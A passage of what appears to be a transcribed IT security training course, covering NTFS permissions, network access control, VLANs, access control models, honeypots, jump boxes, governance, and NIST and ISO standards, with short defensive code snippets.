my data drive on my server – I've got a folder called UserDataFiles. The goal here is to ensure that the Help
Desk group has the ability to create folders under UserDataFiles. But what we don't want is the Help Desk
group having the ability to modify user files. So to make that happen, we begin by right-clicking on the
UserDataFiles folder and going into Properties. [The UserDataFiles Properties dialog box opens. It includes
the General, Security, and Sharing tabs.] For NTFS security, we have to go onto the Security tab, so I'll click
on that. [The Security tabbed page opens in the UserDataFiles Properties dialog box. It includes the
Permissions for CREATOR OWNER drop-down list, Edit button, and Advanced button. At the bottom right-
hand side of the UserDataFiles Properties dialog box are the Ok and Cancel buttons. The Permissions for
CREATOR OWNER drop-down list includes the Full control, Modify, Special Permissions, and Read drop-
down options.] Now there are some precanned NTFS permissions as you see here on the left like Full control,
Modify, Read & execute, and so on. But, if you look through the list, there is nothing here about creating
folders.
So that's considered a Special permission. It's a little more granular. So I'm not going to click the Edit button
because I want to add more specific permissions otherwise called Special permissions. For that, I'll click on the
Advanced button [He clicks the Advanced button and the Advanced Security Settings for UserDataFiles dialog
box opens. It includes the Permissions, Auditing, and Effective Access tabs. By default, the Permissions tabbed
page is open. The Permissions tabbed page includes the Add, OK, and Cancel buttons.] and from here, I'm
going to click Add. [The Permissions Entry for UserDataFiles dialog box opens. It includes the Select a
principal link, the Type drop-down list, the Applies to drop-down list, the Basic permissions section, and the
Cancel button.] I'll then click on the Select a principal link [The Select User, Computer, Service Account, or
Group dialog box opens. It includes the Enter the object name to select text box, the Advanced button, the
Check Names button, and the OK button.] and I want to add the Help Desk group. [He enters the name help
desk in the Enter the object name to select text box and clicks the Check Names button.] So I'll go ahead and
type that in and check the name, looks good. I'll click OK. [The Select User, Computer, Service Account, or
Group dialog box closes and the Permission Entry for UserDataFiles dialog box appears on the screen.] So
my Help Desk group can either be set to Allow or Deny for this part of the file system. [He clicks the Type
drop-down list. It includes the Allow and the Deny drop-down options.] Well, we want to Allow it in our
scenario. I want to make sure that the permissions we set apply to the folder itself as well as to subfolders and files within it, whether they exist now or are created later, because permissions in the file system get inherited by default. [He clicks the Applies to drop-down list. It includes the This folder only
and the This folder, subfolders and files drop-down options.]
Now notice that when you add an entry to an ACL – so here, the entry is the Help Desk group – it gets Read & execute, List folder contents, and Read permissions by default. [The Basic permissions section
includes the Read & execute checkbox, the List folder contents checkbox, the Read checkbox, and the Show
advanced permissions link. These checkboxes are selected.] That's not enough because we need the Help Desk
group to be able to create folders. For that over on the far right, I'm going to have to click the Show advanced
permissions link. Now you'll notice that one of the permissions that is available is Create folders / append data.
So I'm going to turn that one on and that's it. I'm going to click OK. [The Permission Entry for UserDataFiles
dialog box closes.] And I'll click OK [He clicks the OK button in the Advanced Security Settings for
UserDataFiles dialog box. Then this dialog box closes.] and OK again. [He clicks the OK button in the
UserDataFiles Properties dialog box. Then it closes and the Data (I:) window is displayed.] Now that puts us
back in Windows Explorer. Now that we've applied those changes, let's actually go back and double check our
work. We can do that by right-clicking on the folder and going into Properties. [He right-clicks the
UserDataFiles folder and clicks the Properties option from the flyout.] Then again, clicking on the Security
tab, again clicking the Advanced button, but this time we're going to click the Effective Access tab, where
we're going to Select a user that's in that group. [The Effective Access tabbed page includes the Select a user
link, the select a device link, and the View effective access button. At the bottom right-hand side of the
Advanced Security settings for UserDataFiles dialog box are the OK and Cancel buttons. He clicks the Select
a user link and the Select User, Computer, Service Account, or Group dialog box opens. He types help in the
Enter the object name to select text box and clicks the Check Names button. Then the Multiple Names Found
dialog box opens. It includes the OK and Cancel buttons.]
Now we know that HelpDesk User1 was a member of that group. So we're going to select them and click
OK. [Then the Multiple Names Found dialog box closes. The Select User, Computer, Service Account, or
Group dialog box reappears and he clicks the OK button. Then this dialog box closes and the Advanced
Security Settings for UserDataFiles dialog box reappears.] Now what we want to do is click the View
effective access button down below. [Then a table with three columns and several rows appears below the
View effective access button. The column headers are Effective access, Permissions, and Access limited
by.] Now, as we scroll down, we can see what happens here. Notice that there is a green checkmark – and a little picture of a group, which means the user got the permission through group membership – showing that HelpDesk User1 has the ability to create folders, but can't write, delete, or do anything like that. So user files are protected. We've solved our issue by granting only the permissions that the Help Desk group requires in our scenario. In this video, we learned how to set NTFS file system permissions.
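The same grant can be scripted rather than clicked through; a minimal PowerShell sketch using Get-Acl and Set-Acl, assuming the same folder and group as the demo and that the domain's NetBIOS name is FAKEDOMAIN:

$path = "I:\UserDataFiles"
$acl  = Get-Acl -Path $path

# Allow the Help Desk group to create folders (and read), inherited by subfolders and files
$rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule -ArgumentList `
    "FAKEDOMAIN\Help Desk", "CreateDirectories, ReadAndExecute", "ContainerInherit, ObjectInherit", "None", "Allow"

$acl.AddAccessRule($rule)
Set-Acl -Path $path -AclObject $acl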
After completing this video, you will be able to recognize the purpose of controlling network access with
Network Access Control (NAC).
Objectives
[Topic title: Network Access Control. The presenter is Dan Lachance.] The first line of defense for network
security is limiting who can connect to the network in the first place – whether it's wired or wireless. In this
video, we'll talk about Network Access Control. This is often referred to as NAC – N-A-C. And it applies to
connectivity points or edge point devices on the network – things like network switches, wireless routers, VPN appliances, dial-in appliances, and so on; essentially, entry points to the network. Network Access Control
components include the supplicant – this is the client device that's attempting to connect to a network. So it
could be an end user with their smartphone or their laptop or a desktop or tablet device. An endpoint device is
also referred to as a RADIUS client. Now you have to be careful not to confuse that with the supplicant.
So the RADIUS client is not the end-user smartphone or a laptop, for instance, trying to connect through a
VPN, those are called supplicants. A RADIUS client is an edge point network device like a switch, a VPN
device, or a wireless router. Endpoint devices, however, should never perform authentication because they're
on the edge of the network. They potentially could be compromised. And, if they are compromised, we don't
want credentials revealed from those devices. So, instead, they should use an authentication server where they
forward authentication requests. Now the authentication server is simply called a RADIUS server. And this
centralized authentication host should exist on a protected internal network – our endpoint devices will forward
requests to it.
IEEE 802.1X is a security standard. It's port-based Network Access Control, where a port is simply a logical connection to the LAN. It uses EAP – E-A-P, which stands for Extensible Authentication Protocol. Only EAP traffic is allowed when a device initially attempts to connect to the network, until after successful authentication. This is called EAPOL, or EAP over LAN. This means that the client device – the supplicant – won't even have a valid IP address until after successful authentication. The endpoint device, let's say an Ethernet switch, does have an IP address, and it communicates with our central RADIUS server to ensure authentication succeeds first.
Now, in order to be IEEE 802.1X compliant, equipment like wireless routers or network switches may already support it or may simply need a firmware update. In some cases, you might actually have to replace your existing endpoint devices. IEEE 802.1X can also integrate with intrusion detection systems (IDSs), intrusion prevention systems (IPSs), SIEM systems – used for security monitoring – as well as mobile device management or MDM solutions. Wireless routers can support WPA – Wi-Fi Protected
Access – or WPA2-Enterprise. Now WPA on a wireless network simply means a preshared key is configured
on the wireless router and that must be known by the connecting wireless clients.
However, WPA2-Enterprise is considered more secure than WPA or WPA2 preshared keys – PSKs. Now the
preshared key is simply a symmetric key, but when we use the Enterprise mode of WPA or WPA2, it uses a RADIUS server – a central authentication server – where we configure the RADIUS server IP address and listening port,
which has a default of UDP 1812. Also, a RADIUS client like a VPN appliance or a wireless router needs to be
configured with a shared secret, which is also configured on the centralized RADIUS authentication server. So
the key is used between RADIUS clients and servers and it is case sensitive.
[The web page of ASUS Wireless Router RT-N66U is open. Along the top of the screen are the Logout and
Reboot buttons. The rest of the page is divided into two parts. The first part includes three sections: the Quick
Internet Setup, General, and Advanced Settings. The General section includes the Network Map, Guest
Network, and AiCloud 2.0 tabs. The Advanced Settings section includes the Wireless, LAN, and WAN tabs. The
second part is divided into two sections. The first section includes a diagram. The diagram includes three
subsections. The first subsection includes the information about the Internet status. The second subsection
includes the information about the security level. The third subsection includes the information about the
clients and the USB devices that are connected. The second section is the System Status. This includes the
2.4GHz tab, the 5GHz tab, and the Status tab. The 2.4GHz tab is open. It includes the Wireless name(SSID)
text box and the Authentication Method drop-down list.] On the screen, currently, you can see an ASUS
wireless router. And over on the right, under the System Status section, we can see that the Authentication
Method is configured for WPA2-Personal, which uses a preshared key. Here it's using AES encryption. So
there is a preshared key configured down below and that must be known by connecting clients. However, from
the Authentication Method drop-down list, what we could do is use for instance WPA2-Enterprise. [As soon
as Dan selects the WPA2-Enterprise drop-down option, the WPA-PSK key text box disappears.] Notice we lose the field for the preshared key because it doesn't get used. Instead, what I would do is click on Wireless over on the left.
Now what you click on will vary greatly from one Wireless router admin page to another. [He selects the
Wireless tab and the Wireless tabbed page opens in the second part. The top of the page includes the General
tab, the WPS tab, and the RADIUS Setting tab. By default, the General tabbed page is open. The General
tabbed page includes the Band drop-down list, the SSID text box, and the Apply button.] But, anyways, here
I'll then click on the RADIUS Setting tab up at the top. [The RADIUS Setting tabbed page opens. It includes
the Band drop-down list, the Server IP Address text box, the Server Port text box, the Connection Secret text box, and the Apply button.] And this is where I would specify the Server IP
Address of the centralized RADIUS authentication server. [He is referring to the Server IP Address text
box.] You can see that the listening port defaults to 1812. [He is referring to the Server Port text box.] And
then I configure the connection or shared secret that was configured on the RADIUS server. [He resumes the
explanation of the Network Access Control.] One final aspect of Network Access Control is client or
supplicant health checks – not to be confused with the RADIUS client.
We're talking about the actual end-user device like a smartphone or a laptop attempting to connect to the
network. So the health of that device can be checked where some configurations can be autoremediated. So the
things that might be checked in terms of health would be whether or not a malware scanner is functional and
up to date – whether a firewall is turned on on the device, whether updates have been applied, and whether
correct hardware peripherals exist – which might be required, for instance, for multifactor authentication. Now
autoremediation might mean, for instance, that if the firewall is there but not turned on on a connecting device,
it might be turned on so that the device is compliant and can continue to connect to the network. In this video,
we discussed Network Access Control.
Upon completion of this video, you will be able to recognize the purpose of network segregation using virtual
LANs.
Objectives
[Topic title: VLANs. The presenter is Dan Lachance.] In this video, we'll talk about VLANs. A VLAN is a
virtual local area network. It allows us to create a LAN which is considered a broadcast domain. And what that
means is that when a device sends out a broadcast to everyone, it is read by all devices on that LAN. A VLAN is applied at Layer 2 of the OSI model – the data-link layer, which also deals with MAC addresses. A VLAN is configured within a switch, which is where the "virtual" in VLAN comes from.
All switch ports, by default, are in the same VLAN. A VLAN can consist of some of the devices plugged into the switch or all of them; it depends on how we configure the VLAN, which we'll go over shortly. VLANs can also span multiple switches that are linked together. The purpose of a VLAN can be either performance – breaking a larger network into smaller segments, which means we end up with multiple broadcast domains, so multiple VLANs – or security, to
keep certain network devices isolated from others.
Now traffic from one VLAN doesn't reach other VLANs without a router, just like if you had separate physical local area network segments, you would need a router to link them together. A Layer 3 switch operates at Layer 3 of the OSI model – the network layer – and has routing capabilities built in. Therefore, a Layer 3 switch can link VLANs without the need for an external router. Now we might, for example,
have a VLAN that's used for imaging, which consumes a lot of bandwidth. And we might also have a different
VLAN for security purposes to keep accounting staff network traffic on its own network.
There are different types of VLAN configurations, the first of which is a switch port membership VLAN. In other words, the physical switch port that a device is plugged into determines the VLAN that it's a member of. This would apply to OSI Layer 1 since we're talking about physical characteristics and
things that are plugged in with cables and connectors. The VLAN ports in this case do not have to be
contiguous – although in our pictured diagram they are [A diagram of Ethernet switch is displayed. It contains
eight ports.] – where on the left, the leftmost four ports are part of the OS imaging VLAN whichever devices
are plugged in. And on the right, the rightmost ports are for the accounting VLAN.
So it's important then when we plug devices into a network switch that we are conscious of how VLANs have
been configured. So plugging a station into a specific switch port could be a problem where it can't
communicate with the server it needs to talk to. Whereas, if you plug that into a different switch port and it
puts it on the right VLAN, maybe it would be able to talk to the server. So moved computers might require
either switch VLAN reconfiguration or you simply might have to plug them into the correct port. We could also configure MAC address-based VLANs. The MAC address is the 48-bit unique hardware address burned into the network card. It's also called a Layer 2 address; Layer 2 of the OSI model is the data-link layer.
So devices then with specific MAC addresses would be considered on the same VLAN. Each MAC address of
each device is associated with a specific VLAN. It's important to realize, of course, that switches already track
all of the MAC addresses plugged into specific ports on a switch. So for example, a given 48-bit hex MAC
address might be assigned to VLAN number 5. We can also create IP subnet VLANs, in other words, based on
the IP address of the plugged in device.
This would apply to OSI Layer 3 – the network layer. So devices with a specific IP network prefix are
considered to be on the same VLAN. So therefore, it wouldn't matter then which physical switch port the
device would be plugged into. Routing would allow VLANs to communicate with each other. So for example,
we could have a specific IP network prefix or address that is configured to be on a specific VLAN. [Subnet of
VLAN 5 is 25.1.2.3 and of VLAN 10 is 26.1.2.3.]
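To tie these membership types together, here is a minimal Python sketch of how VLAN membership could be looked up by switch port, by MAC address, or by IP subnet; the port numbers, MAC address, and network prefixes are made up for illustration and don't reflect any particular switch vendor.

    import ipaddress

    port_vlans = {1: 5, 2: 5, 3: 5, 4: 5, 5: 10, 6: 10, 7: 10, 8: 10}   # switch port membership
    mac_vlans = {"90-48-9A-11-BD-6F": 5}                                 # MAC address-based membership
    subnet_vlans = {ipaddress.ip_network("25.1.0.0/16"): 5,             # IP subnet-based membership
                    ipaddress.ip_network("26.1.0.0/16"): 10}

    def vlan_for(port=None, mac=None, ip=None):
        # Return the first matching VLAN ID, checking port, then MAC, then IP subnet.
        if port in port_vlans:
            return port_vlans[port]
        if mac in mac_vlans:
            return mac_vlans[mac]
        if ip is not None:
            addr = ipaddress.ip_address(ip)
            for network, vlan in subnet_vlans.items():
                if addr in network:
                    return vlan
        return None

    print(vlan_for(port=3))          # 5  - the OS imaging VLAN in the diagram
    print(vlan_for(ip="26.1.2.3"))   # 10 - the accounting VLAN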
Other VLAN membership types include being configured for certain protocols. So for instance, using the IP
versus the IPX protocol suite or even using higher-level software or services to determine VLAN membership.
For instance, FTP traffic could place devices on an FTP-specific VLAN for that type of traffic. In this video,
we discussed VLANs.
Find out how to identify various conditions that restrict access to resources.
Objectives
[Topic title: Determining Resource Access. The presenter is Dan Lachance.] In this video, we'll talk about
resource access. A resource is something that we can connect to over a network like a file server, a database
server, a web application, and so on. So, when we determine resource access, we're talking about authorization
to use the resource. And authorization can only occur after successful authentication. Authentication is the
proving of one's identity, whether it's a user entering a username and a password or a specific smartphone with
a trusted PKI certificate being allowed to connect to a VPN as an example. ACLs are access control lists that
determine privileges that are granted or denied. Now you could have ACLs that apply at the network level. A
network ACL is something you would see on a packet filtering firewall to control traffic into and out of a
network, but then you could also see an ACL for a database that controls access to do certain things like insert
or update rows in the database table or it could be related to permissions granted to a folder on a file server and
so on. So there are many different incarnations, then, of ACLs.
There are also other attributes that determine access to resources such as time-based, rule-based, location-
based, and role-based configurations. Let's take a look at each of those starting with time based. With time-
based resource access, we need to have a reliable time source. In a network environment, that really means
we're talking about using the Network Time Protocol or NTP to keep time in sync among multiple network
devices. We might have specific days and times where access is allowed. For example, SSH traffic from a
specific subnet to specific hosts might only be allowed during business hours. We might also have different
types of access depending on the time of day. For example, we might ensure that nobody is connected to a
server at 8:00 p.m. during weeknights because of backups.
We might also configure this time-based resource access through policies or on a specific network device. So
we might use centralized Microsoft Group Policies in Active Directory to configure this resource access or it
might be configured on a single device like a Cisco router. Now naturally, when it comes to troubleshooting,
IT technicians need to be aware if this type of time-based resource access is in use because without knowledge
of how this is configured, it could take a long time to troubleshoot why a user can't connect to a resource when,
in fact, it simply might not be allowed based on this type of configuration.
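As a rough illustration of the time-based idea, here is a minimal Python sketch that only allows access during weekday business hours; the hours chosen and the simple allow/deny function are assumptions for illustration, not how any particular product implements it.

    from datetime import datetime

    def access_allowed(now: datetime) -> bool:
        # Allow access Monday (0) through Friday (4), 08:00 to 17:59 local time.
        is_weekday = now.weekday() < 5
        in_business_hours = 8 <= now.hour < 18
        return is_weekday and in_business_hours

    print(access_allowed(datetime(2017, 3, 6, 9, 30)))   # Monday 09:30 -> True
    print(access_allowed(datetime(2017, 3, 6, 20, 0)))   # Monday 20:00 -> False (backup window)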
Then there is rule-based access control, which is also referred to as RBAC, or sometimes ABAC, where the "A" stands for attribute – attribute-based access control. Basically, what this means is we are using conditions or rules that
determine resource access. An example of this is the Microsoft Windows Server 2012 R2 Dynamic Access
Control or DAC. This means, for example, users might have to belong to a group such as HR, but at the same
time, they have to be full-time employees and they might then get read/write privileges. Now full-time
employees could be determined through group membership, but one of the great things with condition or rule-
based access control is that we don't have to use groups. So, in the case of a Windows user – an Active
Directory user account – maybe there's an attribute filled in that determines whether that user is full-time or
not. So Dynamic Access Control can look at Active Directory attributes instead of just the traditional group
membership.
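Conceptually, a condition like the Dynamic Access Control example above boils down to evaluating attributes rather than just group membership. A minimal Python sketch, with made-up attribute names, might look like this:

    def effective_access(user: dict) -> str:
        # Grant read/write only to HR members who are also full-time employees.
        if "HR" in user.get("groups", []) and user.get("employee_type") == "full-time":
            return "read/write"
        return "no access"

    print(effective_access({"name": "jdoe", "groups": ["HR"], "employee_type": "full-time"}))   # read/write
    print(effective_access({"name": "asmith", "groups": ["HR"], "employee_type": "contract"}))  # no access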
Location-based access control can also be referred to as LBAC. This is where the physical location of a user or
more specifically a device that they're using determines what access they have to resources. In the case of a
mobile device, we might use GPS tracking to determine the proximity of the user to a certain location or a
wireless network. Geofencing, for example, might disable mobile device cameras when the user is using that
mobile device within a secured area within a facility.
Role-based access control is also often referred to as RBAC. So, whenever you see RBAC, be careful to look
at the context in which that term is being used to ensure that you know whether it's referring to rule-based
access control or, as we're discussing now, role-based access control. With role-based access control,
privileges are assigned to roles. Users are then assigned to the roles. And therefore, they inherit the
permissions assigned to the role they're assigned to. Now this will facilitate access control list management in
larger companies because it's too difficult to manage, on a large scale, individual resource permissions granted
to individual user accounts. In this video, we discussed how to determine resource access.
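Before moving on, here is a minimal Python sketch of the role-based model just described, where permissions are attached to roles and users inherit them; the role and permission names are invented for illustration.

    role_permissions = {
        "helpdesk": {"reset_password", "read_tickets"},
        "hr_manager": {"read_hr_share", "write_hr_share"},
    }
    user_roles = {"jdoe": ["helpdesk"], "asmith": ["helpdesk", "hr_manager"]}

    def permissions_for(user: str) -> set:
        # A user's effective permissions are the union of every role they hold.
        perms = set()
        for role in user_roles.get(user, []):
            perms |= role_permissions.get(role, set())
        return perms

    print(permissions_for("asmith"))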
recognize the purpose of intentionally creating vulnerable hosts to monitor malicious use
[Topic title: Honeypots. The presenter is Dan Lachance.] One way to detect malicious use is to configure a
honeypot. A honeypot is designed to monitor unauthorized use where detection of the activity is key. This is
made simple with virtualization, where there are plenty of virtual appliances we can download, or we could build our own virtual machine that has a few security vulnerabilities that would attract malicious users – essentially, it's low-hanging fruit. However, we want to be careful with unpatched DMZ systems.
We want to make sure that a compromised honeypot device doesn't let the attacker into other systems. And, at
the same time, it can also open us up to potential liability claims. Honeypots should be configured to forward
their logs to another secured host elsewhere because the assumption is that the honeypot itself could become
compromised. And, if it does, then any log information – which is what we're looking for here with the
honeypot – well, potentially it could be wiped by the attacker.
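One way to satisfy that forward-the-logs-elsewhere requirement is remote syslog. Here is a minimal Python sketch using the standard library's SysLogHandler to send honeypot events to a separate, hardened log host; the host name, port, and log message are placeholders.

    import logging
    import logging.handlers

    # Forward events over the network so a compromised honeypot can't simply wipe them.
    remote_handler = logging.handlers.SysLogHandler(address=("loghost.internal.example", 514))
    logger = logging.getLogger("honeypot")
    logger.setLevel(logging.INFO)
    logger.addHandler(remote_handler)

    logger.info("SSH login attempt from 203.0.113.50 with username 'root'")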
Honeypots come in various forms and apply to different levels. We can have an entire server operating system
being configured as a honeypot so we can track malicious activity against it. Or we could have a honeypot for
a specific service such as a vulnerable HTTP web service. Or we could have a honeypot for an individual file
or folder in which case it's called a honeytoken.
The HoneyDrive honeypot is a Linux-based virtual appliance that you can download. And it's out of the box
ready to go as an SSH honeypot and a web site honeypot. It also includes a wide variety of monitoring and analytical tools to analyze SSH and web site traffic for malicious users. [The BruteForce Lab's Blog web page
is open. The page includes Home tab, About Me tab, and Miscellaneous drop-down list. By default, the
HoneyDrive tabbed page is open and the Miscellaneous drop-down list is selected. The Miscellaneous drop-
down list includes the DeltaBot, pyMetascan, and phpMetascan drop-down options.] If you plug HoneyDrive
honeypot into your favorite web search engine, it will be very easy to pull up the HoneyDrive honeypot web
page where you can see a description of what it is, you've got a download link, an installation set of
instructions, and a list of all of the features. So essentially, this is a virtual appliance that will run in different
virtualization environments.
[Dan resumes the explanation of honeypots.] So what is the real benefit of a honeypot? Well, its primary
purpose is to identify attack patterns, attacker identities in some cases, and then we can take those results and
further harden similar systems or services based on our findings from the honeypot. However, drawbacks
include the fact that there could be a liability if the honeypot, for instance, is used to target other victims
elsewhere. The other reality is that, from a legal standpoint, honeypot case law is very difficult to find. So there
really are no precedents on which to base current situations.
Upon completion of this video, you will be able to recognize the purpose of a jump box.
Objectives
[Topic title: Jump Box. The presenter is Dan Lachance.] In this video, we'll discuss jump boxes. A jump box
is a secured computer that administrators go through to administer other devices. So it's a central and definable
entry point for administration. Now we must make sure that we harden the jump box itself – the computer through which admins go to administer other devices. Hardening the originating administrative computer is also very important; we might use a clean virtual machine whose purpose is only administration, and nothing additional gets installed on it.
Now, in terms of network precautions, we should always make sure we're using some type of encryption for all network transmissions, such as an IPsec VPN. We might also consider – instead of, or in addition to, that – an isolated VLAN so that administrative traffic is kept separate from regular end-user IP traffic. We should also consider the targeted systems that will be administered. They must be configured appropriately; for example, their host-based firewalls should only allow connections from the jump box. We
should also make sure that the jump box computer itself cannot access the Internet because the last thing we
want to happen is for an administrator using the jump box maybe to download a driver from the Internet – for
example – and infect that jump box, which in turn has connections to other servers.
On the originating administrative station or host, there are precautions that we can take to protect our network.
First is to create a process whitelist – in other words, a list of the only processes that are allowed to run on the originating administrative workstation. We can then determine which accounts are used to log on to that
system. So only administrative accounts, for example, should be allowed to log in to that originating system.
The originating system should also use multifactor authentication. Ideally, you might even use centralized
RADIUS authentication with auditing. Now host logs from this originating system should be forwarded to
another host because if it's compromised, the logs could be wiped.
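As a rough sketch of the process whitelist idea, here is a small Python example that assumes the third-party psutil package is installed; the allowed process names are purely illustrative.

    import psutil  # third-party: pip install psutil

    ALLOWED = {"sshd", "ssh", "bash", "python3"}   # hypothetical whitelist for an admin-only workstation

    def unexpected_processes():
        # Report any running process whose name is not on the whitelist.
        for proc in psutil.process_iter(attrs=["pid", "name"]):
            name = (proc.info.get("name") or "").lower()
            if name and name not in ALLOWED:
                yield proc.info["pid"], name

    for pid, name in unexpected_processes():
        print(f"Unexpected process {name} (PID {pid})")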
A jump box arguably is a compelling target for malicious users. And the reason for this is quite simple because
if the jump box gets compromised, that could then give access potentially to multiple internal servers that are
administered through the jump box. On the subject of scalability, you could look at this from two perspectives. You could say that a jump box scales well because you've got a definable entry point for managing a multitude of servers, whether they're on premises, in the cloud, or both. But, on the other hand, you could say that it doesn't scale well. That really depends on specifics, but, for example, if we're talking about hundreds of administrators connecting through a single jump box to administer hundreds of internal servers elsewhere, yes, it could be a scalability issue. So you might need more than one jump box. You might even use a load-balanced configuration.
In this video, we talked about jump boxes.
Table of Contents
After completing this video, you will be able to explain how proper IT governance results in secured IT
resources.
Objectives
[Topic title: IT Security Governance. The presenter is Dan Lachance.] IT security relates to risk. And risk
management is a very important responsibility. In this video, we'll talk about IT security governance.
IT security strategies need to align with business objectives because that's why IT systems are used in the first
place. There could be legal and regulatory compliance reasons that we have certain security controls in place.
We also have to consider their influence potentially on organizational security policies. Security governance
also deals with the responsibility related to the IT security strategy for the organization.
The oversight of risk management relates to IT security managers that must make decisions about effective
security controls that protect assets. IT security governance also deals with decision-making power and where
it lies. The creation of security policies and also the allocation of resources to protect assets fall under the
umbrella of IT security governance. IT security management deals with the enforcement of those security
policies and the actual usage of those resources. So notice the distinction then between IT security governance
and IT security management.
NIST, the National Institute of Standards and Technology in the United States, lists five common areas of IT
security governance where there is the protection of organizational assets, there is the protection of the
organization's reputation, there is the protection of shareholders, there is the acceptable use of IT systems by
organization employees, and of course, there is the assurance of legal and regulatory compliance.
With IT security governance, accountability for the IT security strategy falls upon the leaders. Related costs
are also considered – the costs that are required to stay in business. You can't get away without spending a
penny on IT security in a large organization. It is the cost of doing business. However, it needs to be worth the
investment and it has to, of course, be worth the asset that's being protected. User awareness and training is
very critical in assuring that everyone knows what the organization's specific IT strategy is. IT security
governance also implies that there is ongoing monitoring and review of security controls to ensure their
effectiveness in protecting assets.
After completing this video, you will be able to recognize how compliance with regulations can influence
security controls.
Objectives
Regulations will vary from industry to industry and also from jurisdiction to jurisdiction around the globe.
However, regulations can have an influence over the organization security policy, acceptable use policies, and
also the selection of which security controls will be used. So for example, specific data sanitization or wiping
tools might be required for law enforcement when wiping hard disks before equipment is decommissioned.
Confidentiality could also be a part of regulatory compliance where we are preventing the unauthorized access
of sensitive data. So encryption might be required for data in use, data in motion such as that being transmitted
over a network, and data at rest such as data being stored on disks either on premises or in the cloud. In some
cases, regulations might detail what are acceptable algorithms that are used for the encryption.
Regulatory compliance can also stipulate how we verify data integrity or the trustworthiness of data. There
might be certain authentication controls that must be put in place such as multifactor authentication, which is
required to connect to a sensitive network. Or there might be hashing that is required to generate a unique
value on data so that in the future when we run that calculation again, we can detect whether or not a change
has occurred because if a change has occurred, the unique value or hash will be different than the original hash.
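As a concrete example of the hashing idea, here is a minimal Python sketch that records a SHA-256 hash of a file and later re-checks it; the file name is a placeholder.

    import hashlib

    def sha256_of(path: str) -> str:
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                digest.update(chunk)
        return digest.hexdigest()

    original = sha256_of("customer_records.csv")      # stored securely at baseline time
    # ... later ...
    if sha256_of("customer_records.csv") != original:
        print("Integrity check failed - the data has changed since the baseline hash was taken.")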
Regulatory compliance can also apply to the availability of IT systems, networks, and data so that data is
available when it's needed. Now this might require us to use a clustering solution so that network services are
running on multiple hosts. And, should one host fail, users will be redirected to that same network service
running on another host. Now, in order for the data to be kept up to date and consistent, clustered servers might
use shared storage. We might also use replication to replicate data to other locations or even to synchronize it
to the cloud. So we have another copy that's available if something happens to the primary copy of data. Now,
if we're going to do that, we should look very carefully at our cloud service-level agreement or SLA to make
sure that we know exactly what the availability promises are from that specific provider.
Some examples of regulations include Canada's PIPEDA. This is the Personal Information Protection and
Electronic Documents Act where it relates to data collection and how it will be used for private information. In
the United States of America, we've got HIPAA – the Health Insurance Portability and Accountability Act –
which controls how sensitive patient health information is protected and shared. In the European Union,
we've got the EU Data Protection Directive – Directive 95/46/EC – which deals with the protection of personal
data in and outside of the European Union.
Find out how to apply NIST's Cybersecurity Framework to your digital assets.
Objectives
apply NIST's Cybersecurity Framework to your digital assets
[Topic title: NIST. The presenter is Dan Lachance.] Standards are an important aspect of computing including
as it relates to security. In this video, we'll talk about NIST.
NIST stands for the National Institute of Standards and Technology in which there is a division called the
Computer Security Resource Center or CSRC. This division deals with the protection of information systems
in terms of tools that can be used and best practices to be followed.
FIPS stands for Federal Information Processing Standard. And it's a guideline used by US government
agencies. FIPS 201-2 deals with personal identity verification of federal employees and contractors. [Dan is
referring to Personal Identity Verification of Federal Employees and Contractors for the year 2013.] Now this
can be done in a variety of ways by using smart card authentication where the possession of the physical card
is required in addition to knowledge of the PIN for the smart card. There are also specific card reader
requirements that must be met for the use of smart cards. There are certain cryptographic algorithm
requirements to be trusted that are part of FIPS 201-2 as well as the use of biometric authentication. Biometric
authentication is based on some unique characteristic that someone possesses such as their fingerprint or their
retinal scan.
FIPS 197 deals with the Advanced Encryption Standard (AES) as of 2001. It supersedes the 1970s-derived DES or Data Encryption Standard. AES uses the Rijndael algorithm. And it's applied to both software and firmware. So it can be used in many different devices and many different operating systems and applications. AES is a symmetric block cipher that supports key sizes of 128, 192, and 256 bits.
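For a sense of what using AES looks like in practice, here is a minimal sketch using the AES-GCM interface of the third-party Python cryptography package; key storage and distribution are deliberately ignored here.

    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # third-party: pip install cryptography

    key = AESGCM.generate_key(bit_length=256)   # 256-bit AES key
    aesgcm = AESGCM(key)
    nonce = os.urandom(12)                      # must be unique per message

    ciphertext = aesgcm.encrypt(nonce, b"Sensitive payroll data", None)
    plaintext = aesgcm.decrypt(nonce, ciphertext, None)
    assert plaintext == b"Sensitive payroll data"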
FIPS 186-4 is the digital signature standard. It defines acceptable methods that can be used to create unique
digital signatures. The purpose of a digital signature is to verify the authenticity of the originator – the sender
of a message. For example, in the case of e-mail, the sender generates a unique digital signature using their
private key to which only they have access. Now, on the receiving end, we can detect whether tampering has
taken place because we'll use a mathematically related public key to verify that the signature value is the same.
If it's different, something has changed. The digital signature standard also deals with nonrepudiation where an
originator cannot deny having sent the message because it was created with the private key to which only they
have access.
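Here is a minimal sketch of that sign-and-verify flow using ECDSA – one of the algorithms approved in FIPS 186-4 – with a recent version of the third-party Python cryptography package; error handling and key distribution are omitted.

    from cryptography.hazmat.primitives.asymmetric import ec
    from cryptography.hazmat.primitives import hashes
    from cryptography.exceptions import InvalidSignature

    private_key = ec.generate_private_key(ec.SECP256R1())   # kept secret by the sender
    public_key = private_key.public_key()                   # distributed to recipients

    message = b"Wire $500 to account 12345"
    signature = private_key.sign(message, ec.ECDSA(hashes.SHA256()))

    try:
        public_key.verify(signature, message, ec.ECDSA(hashes.SHA256()))
        print("Signature valid - message came from the private key holder and was not altered.")
    except InvalidSignature:
        print("Signature invalid - the message was altered or the sender is not who they claim.")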
During this video, you will learn how to apply ISO security standards to secure your environment.
Objectives
apply ISO security standards to harden your environment
[Topic title: ISO. The presenter is Dan Lachance.] In this video, I'll discuss ISO.
ISO stands for the International Organization for Standardization. It publishes series of standards and best practices that can be adopted by organizations. In some cases, organizations might require ISO compliance and so,
therefore, must follow standards and best practices as suggested. ISO publishes numerous documents including
ISO/IEC 27033-5. Now this deals with securing communications across networks using virtual private
networks or VPNs. So it will detail VPN types, how VPN appliances are configured, and how VPN
connections supply confidentiality through various encryption methods. Confidentiality prevents sensitive
information from being accessible by unauthorized users.
ISO/IEC 27039 deals with the selection, deployment, and operations of intrusion detection and prevention
